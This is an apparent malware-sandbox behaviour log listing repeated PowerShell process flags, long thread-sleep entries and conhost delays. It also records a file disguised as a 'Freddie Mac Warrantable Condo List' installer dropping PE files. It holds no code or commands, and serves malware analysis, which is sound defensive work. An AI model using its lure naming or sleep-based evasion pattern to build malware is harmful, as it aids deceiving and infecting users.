Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6268	Thread sleep count: 4215 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6268	Thread sleep count: 207 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2484	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5360	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep time: -32653s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep time: -30856s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep time: -31266s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep time: -30580s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep time: -38123s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep time: -35172s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep time: -31929s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640	Thread sleep count: 8447 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640	Thread sleep count: 69 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6916	Thread sleep time: -35459s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6916	Thread sleep time: -37981s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6712	Thread sleep count: 8497 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716	Thread sleep count: 199 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6940	Thread sleep time: -31267s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6940	Thread sleep time: -36331s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6940	Thread sleep time: -30444s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6940	Thread sleep time: -37323s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6808	Thread sleep count: 2883 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5624	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6984	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4716	Thread sleep count: 3102 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2592	Thread sleep count: 384 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1744	Thread sleep count: 2202 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2024	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2024	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6936	Thread sleep count: 2418 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6936	Thread sleep count: 394 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824	Thread sleep count: 5838 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824	Thread sleep count: 398 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_isdecmp.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_setup64.tmp			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
